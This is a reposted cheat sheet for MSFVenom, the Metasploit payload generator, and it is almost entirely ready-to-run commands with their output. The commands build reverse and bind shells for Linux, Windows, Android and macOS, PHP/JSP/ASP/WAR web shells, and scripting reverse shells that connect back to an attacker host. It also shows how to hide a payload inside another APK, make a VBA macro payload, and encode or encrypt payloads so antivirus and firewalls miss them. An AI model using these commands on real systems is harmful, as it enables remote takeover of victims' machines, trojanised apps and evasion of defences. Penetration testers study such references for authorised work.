MSF Venom Cheat Sheet

Disclaimer: This is a clone of the article – https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/. All credits go to the author of the article. The website was not working, and I wanted to preserve the information for the infosec community.

MSFVenom Cheat Sheet – Easy way to create Metasploit Payloads

August 30, 2020 by J. Jogal

I included the most useful MSFVenom commands in this MSFVenom cheat sheet. MSFVenom is a payload generator for Metasploit. You can generate payloads for MSFConsole or Meterpreter. MSFVenom is the successor version of MSFPayload or its replacement of the same.

All the useful commands and one-liners are described in this MSFVenom cheat sheet. (MSFVenom is an improved version of MSFPayload. If you will try commands with MSFPayload, the terminal will give error “msfpayload: command not found”.)

Table of contents

TOC
MSFVenom Cheat Sheet
  List all available MSFVenom payloads
Meterpreter Reverse Shells
  Linux Reverse Shells
  Windows Reverse Shells
  Android Reverse Shells
  macOS Reverse Shells
Meterpreter Bind Shells
  Linux Bind Shell
  Windows Bind Shell
  macOS Bind Shell
Meterpreter Web Payloads
  PHP Meterpreter Reverse Shells
  Java JSP Meterpreter Reverse TCP
  ASP Meterpreter Reverse TCP
  WAR Payload Shells
Scripting Payloads
  Bash Unix Reverse Shell
  Python Reverse Shell
  Perl Unix Reverse shell
  WAF and Antivirus Detection(AV) Bypass using MSFVenom Encoders
List all the Encoder types
List Payload Options
List all Platforms
List all Payload Formats
Output Payload Architecture
List all the archs
Payloads with Encryptions
List of Encrypt methods
How to Use these Paylaods in MSFConsole
FAQs
Final Words,
Reference,

MSFVenom Cheat Sheet

List all available MSFVenom payloads

Here I described the most useful MSFVenom commands and payloads in this MSFVenom cheat sheet. You can list all the payloads using the following command.

$ msfvenom -l payloads

Framework Payloads (562 total) [--payload ]
==================================================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    apple_ios/aarch64/shell_reverse_tcp                 Connect back to attacker and spawn a command shell
    cmd/unix/bind_netcat                                Listen for a connection and spawn a command shell via netcat
    java/jsp_shell_reverse_tcp                          Connect back to attacker and spawn a command shell
    java/shell/reverse_tcp                              Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager
    linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
    linux/x86/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    nodejs/shell_reverse_tcp                            Creates an interactive shell via nodejs
    osx/armle/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    osx/armle/shell_bind_tcp                            Listen for a connection and spawn a command shell
    osx/x64/meterpreter/reverse_tcp                     Inject the mettle server payload (staged). Connect, read length, read buffer, execute
    php/meterpreter/bind_tcp                            Run a meterpreter server in PHP. Listen for a connection
    php/meterpreter/reverse_tcp                         Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions
    python/meterpreter/bind_tcp                         Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection
    python/meterpreter/reverse_http                     Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP
    ruby/shell_reverse_tcp                              Connect back and create a command shell via Ruby
    windows/dllinject/reverse_tcp_allports              Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/meterpreter/bind_tcp                        Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Listen for a connection (Windows x86)
    windows/meterpreter/reverse_tcp                     Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/x64/meterpreter/reverse_tcp                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
    windows/x64/meterpreter/reverse_http                Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
...

Here we will consider,

LHOST = 10.10.10.10, RHOST = 12.12.12.12, LPORT = 4545

Meterpreter Reverse Shells

Linux Reverse Shells

# x86
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf

# x64
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf

# x86 Reverse HTTP
$ msfvenom -p linux/x86/meterpreter_reverse_http LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf

# x64 Reverse HTTP
$ msfvenom -p linux/x64/meterpreter_reverse_http LHOST=10.10.10.10 LPORT=4545 -f elf > shell.elf

Windows Reverse Shells

# x86 normal
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

# x64 (CMD Single Stage)
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

# reverse HTTP
$ msfvenom -p windows/meterpreter/reverse_http LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

# reverse HTTPS
$ msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

# Powershell Payload
$ msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4545 > shell.bat

# Macro Payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f vba

Android Reverse Shells

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 R > shell.apk

# Android Embed Payload with another apk
$ msfvenom -x anyApp.apk android/meterpreter/reverse_tcp lhost=10.10.10.10 lport=4545 -o shell.apk

# Reverse HTTP
$ msfvenom -p android/meterpreter/reverse_http LHOST=10.10.10.10 LPORT=4545 R > shell.apk

# Reverse HTTPS
$ msfvenom -p android/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=4545 R > shell.apk

macOS Reverse Shells

$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f macho > shell.macho

# Reverse TCP Shellcode
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f < platform

Meterpreter Bind Shells

Linux Bind Shell

# x86 (multi stage)
$ msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=12.12.12.12 LPORT=4545 -f elf > shell.elf

# x64 (single stage)
$ msfvenom -p linux/x64/shell_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f elf > shell.elf

Windows Bind Shell

$ msfvenom -p windows/meterpreter/bind_tcp RHOST=12.12.12.12 LPORT=4545 -f exe > bind.exe

# Hidden Bind TCP Payload
$ msfvenom -p windows/shell_hidden_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f exe > hidden_shell.exe

macOS Bind Shell

$ msfvenom -p osx/x86/shell_bind_tcp RHOST=12.12.12.12 LPORT=4545 -f macho > shell.macho

Meterpreter Web Payloads

PHP Meterpreter Reverse Shells

$ msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4545 -f raw > shell.php

# PHP Meterpreter Reverse TCP
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f raw > shell.php
$ cat shell.php | pbcopy && echo ‘<?php ' | tr -d '\n'> shell.php && pbpaste >> shell.php

Java JSP Meterpreter Reverse TCP

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f raw > shell.jsp

ASP Meterpreter Reverse TCP

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f asp > shell.asp

WAR Payload Shells

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f war > shell.war

Scripting Payloads

Bash Unix Reverse Shell

$ msfvenom -p cmd/unix/reverse_bash LHOST=10.10.10.10 LPORT=4545 -f raw > shell.sh

Python Reverse Shell

$ msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4545 -f raw > shell.py

Perl Unix Reverse shell

$ msfvenom -p cmd/unix/reverse_perl LHOST=10.10.10.10 LPORT=4545 -f raw > shell.pl

WAF and Antivirus Detection(AV) Bypass using MSFVenom Encoders

The normal MSFVenom generated payloads can be easily detectable by most of the antivirus software or firewalls. MSFVenom provides one functionality called, Encoders which can be used to bypass some of them Firewalls and Antivirus software. You can take advantage of some of them for AV bypass and WAF bypass. Use -e flag to use the same with any encoder name. Encoder types are also described in the below section.

$ msfvenom --platform Windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=10.10.10.10 LPORT=4545 -f exe > encoded_shell.exe

[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Final size of exe file: 73802 bytes

Here -i flag is used to specifying the number of iterations. Use max possible numbers to make the payload undetectable to antivirus software(AV) and WAFs.

List all the Encoder types

You can list all the encoder types available in msfvenom using –list flag with encoders option.

$ msfvenom --list encoders

Framework Encoders [--encoder ]
======================================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/brace                     low        Bash Brace Expansion Command Encoder
    cmd/echo                      good       Echo Command Encoder
    cmd/generic_sh                manual     Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Bourne ${IFS} Substitution Command Encoder
    cmd/perl                      normal     Perl Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    ruby/base64                   great      Ruby Base64 Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x64/xor_context               normal     Hostname-based Context Keyed Payload Encoder
    x64/xor_dynamic               normal     Dynamic key XOR Encoder
    x64/zutto_dekiru              manual     Zutto Dekiru
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/bmp_polyglot              manual     BMP Polyglot
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/service                   manual     Register Service
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic               normal     Dynamic key XOR Encoder

Among these, “x86/shikata_ga_nai” is the most useful and excellent polymorphic XOR addictive encoder.

List Payload Options

Here I described the most useful MSFVenom command to view the detailed description of the payload in this MSFVenom cheat sheet. Refer to the detailed view before generating the payload which will give an idea about the payload. Use flag –list-options for the same.

# msfvenom -p PAYLOAD --list-options
$ msfvenom -p linux/x86/meterpreter/reverse_tcp --list-options

Options for payload/linux/x86/meterpreter/reverse_tcp:
=========================


       Name: Linux Mettle x86, Reverse TCP Stager
     Module: payload/linux/x86/meterpreter/reverse_tcp
   Platform: Linux, Linux
       Arch: x86
Needs Admin: No
 Total size: 245
       Rank: Normal

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Description:
  Inject the mettle server payload (staged). Connect back to the 
  attacker

Advanced options for payload/linux/x86/meterpreter/reverse_tcp:
=========================

    Name                         Current Setting  Required  Description
    ----                         ---------------  --------  -----------
    AppendExit                   false            no        Append a stub that executes the exit(0) system call
    AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
    AutoRunScript                                 no        A script to run automatically on session creation.
    AutoSystemInfo               true             yes       Automatically capture system information on initialization.
    AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
    AutoVerifySession            true             yes       Automatically verify and drop invalid sessions
    AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
    EnableStageEncoding          false            no        Encode the second stage payload
    EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
    HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
    InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
    MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
    PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
    PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
    PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
    PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
    PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
    PingbackRetries              0                yes       How many additional successful pingbacks
    PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
    PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
    PrependFork                  false            no        Prepend a stub that executes: if (fork()) { exit(0); }
    PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
    PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
    PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
    PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
    PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
    PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
    RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
    ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
    ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
    ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
    ReverseListenerComm                           no        The specific communication channel to use for this listener
    ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
    SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
    SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
    SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
    SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
    StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
    StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
    StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
    StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
    StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
    VERBOSE                      false            no        Enable detailed status messages
    WORKSPACE                                     no        Specify the workspace for this module

Evasion options for payload/linux/x86/meterpreter/reverse_tcp:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------

List all Platforms

You can specify the platform for the payload using –platform flag. Choose any of the following for your target system for the payload generation. In this MSFVenom cheat sheet, I specified the methods to view all the available options to choose from, which will help you to get more ideas about the uses of MSFVenom.

$ msfvenom --list platforms

Framework Platforms [--platform ]
========================================

    Name
    ----
    aix
    android
    apple_ios
    brocade
    bsd
    bsdi
    cisco
    firefox
    freebsd
    hardware
    hpux
    irix
    java
    javascript
    juniper
    linux
    mainframe
    multi
    netbsd
    netware
    nodejs
    openbsd
    osx
    php
    python
    r
    ruby
    solaris
    unifi
    unix
    unknown
    windows

List all Payload Formats

Choose any of the following for the output format of the payload. Specify –format with the option any from below when generating the payload.

$ msfvenom --list formats

Framework Executable Formats [--format ]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format ]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript

Output Payload Architecture

You can specify the framework architecture for the payload using the archs available in this MSFVenom cheat sheet. Use -a to specify the arch for the output payload.

$ msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
 Payload size: 341 bytes
Final size of exe file: 73802 bytes

List all the archs

$ msfvenom --list archs

Framework Architectures [--arch ]
========================================

    Name
    ----
    aarch64
    armbe
    armle
    cbea
    cbea64
    cmd
    dalvik
    firefox
    java
    mips
    mips64
    mips64le
    mipsbe
    mipsle
    nodejs
    php
    ppc
    ppc64
    ppc64le
    ppce500v2
    python
    r
    ruby
    sparc
    sparc64
    tty
    x64
    x86
    x86_64
    zarch

Payloads with Encryptions

You can encrypt the payloads using some of the encryption methods available in MSFVenom. Use –encrypt flag to make the payload encrypted or encoded. You can also make the payload undetectable by the AVs and WAFs by encrypting the payload.

$ msfvenom --encrypt aes256 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

List of Encrypt methods

$ msfvenom --list encrypt

Framework Encryption Formats [--encrypt ]
================================================

    Name
    ----
    aes256
    base64
    rc4
    xor

How to Use these Payloads in MSFConsole

You can get the connect to the target machine using msfconsole and metasploit handler.

# msfconsole commands
msf> use exploit/multi/handler
msf> set PAYLOAD
msf> set RHOST
msf> set LHOST
msf> set LPORT
msf> exploit -j

FAQs

What is MSFVenom?

MSFVenom is a payload generator for Metasploit. You can generate payloads for MSFConsole or Meterpreter. MSFVenom is the successor version of MSFPayload or its replacement of the same.

How to use MSFVenom?

MSFVenom can create many types of payloads using its various types of flags and filters. You can create payloads for any OS, Any architecture, Web payloads, etc. Basic command, “msfvenom -a x86 –platform Windows –encrypt aes256 -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4545 -f exe > shell.exe”. Here is an MSFVenom cheat sheet article that describes all the use cases of MSFVenom.

What is an Encoder in MSFVenom?

The normal MSFVenom generated payloads can be easily detectable by most of the antivirus software or firewalls. MSFVenom provides one functionality called, Encoders which can be used to bypass some of them Firewalls and Antivirus software. You can take advantage of some of them for AV bypass and WAF bypass. Use -e flag to use the same with any encoder name.

Final Words,

This MSFVenom cheat sheet is open for everyone to share the knowledge, so share it with your friends, colleagues, and others so they can also get the help from it to generate Metasploit payloads easily.

Also, Find the another related article, Reverse Shell Cheat sheet

Reference,